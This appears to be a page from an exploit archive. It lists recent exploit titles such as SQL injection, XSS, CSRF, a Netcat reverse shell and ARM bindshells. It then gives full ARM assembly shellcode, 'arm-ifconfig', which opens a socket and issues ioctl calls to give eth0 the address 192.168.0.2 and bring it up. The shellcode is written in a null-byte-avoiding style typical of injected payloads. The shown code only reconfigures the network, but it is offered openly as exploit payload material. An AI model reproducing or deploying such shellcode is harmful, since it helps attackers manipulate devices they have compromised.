3739831fb2
16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities
76 lines
1.5 KiB
NASM
Executable file
76 lines
1.5 KiB
NASM
Executable file
/*
|
|
* Title: arm-ifconfig
|
|
* Brief: Bring up eth0 and assign it the address 192.168.0.2
|
|
* Author: Daniel Godas-Lopez <gmail account dgodas>
|
|
*/
|
|
|
|
/*
|
|
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP);
|
|
*/
|
|
|
|
mov %r0, $2 /* AF_INET */
|
|
mov %r1, $2 /* SOCK_DGRAM */
|
|
mov %r2, $0 /* IPPRTOTO_IP */
|
|
push {%r0, %r1, %r2}
|
|
mov %r0, $1 /* socket */
|
|
mov %r1, %sp
|
|
svc 0x00900066
|
|
add %sp, %sp, $12
|
|
|
|
mov %r6, %r0 /* r6 = soc_des */
|
|
|
|
/*
|
|
ioctl(soc_des, SIOCSIFADDR, &req);
|
|
*/
|
|
|
|
.if 0 /* r0 == r6 already */
|
|
mov %r0, %r6 /* soc_des */
|
|
.endif
|
|
|
|
sub %r1, %r1, %r1
|
|
sub %r2, %r2, %r2
|
|
push { %r1, %r2 }
|
|
mov %r2, $2 /* AF_INET */
|
|
mov %r3, $0x2000000
|
|
add %r3, %r3, $0xa800
|
|
add %r3, $0xc0 /* addr = 192.168.0.2 */
|
|
push { %r2, %r3 }
|
|
sub %r2, %r2, %r2
|
|
sub %r3, %r3, %r3
|
|
push { %r1, %r2, %r3 }
|
|
mov %r3, $0x7400
|
|
add %r3, $0x0065
|
|
mov %r4, $0x3000
|
|
add %r4, $0x0068
|
|
add %r3, %r4, lsl $16 /* "eth0" */
|
|
push { %r3 }
|
|
mov %r2, %sp /* struct __kernel_ifreq */
|
|
add %sp, $32
|
|
|
|
mov %r1, $0x8900
|
|
add %r1, %r1, $0x16 /* SIOCSIFADDR */
|
|
svc 0x00900036
|
|
|
|
/*
|
|
ioctl(soc_des, SIOCGIFFLAGS, &req);
|
|
*/
|
|
|
|
mov %r0, %r6 /* soc_des */
|
|
|
|
mov %r1, $0x8900
|
|
add %r1, %r1, $0x13 /* SIOCGIFFLAGS */
|
|
svc 0x00900036
|
|
|
|
ldr %r3, [%r2, $16]
|
|
orr %r3, %r3, $1
|
|
str %r3, [%r2, $16] /* ifr_flags |= IFF_UP */
|
|
|
|
/*
|
|
ioctl(soc_des, SIOCSIFFLAGS, &req);
|
|
*/
|
|
|
|
mov %r0, %r6 /* soc_des */
|
|
|
|
mov %r1, $0x8900
|
|
add %r1, %r1, $0x14 /* SIOCSIFFLAGS */
|
|
svc 0x00900036
|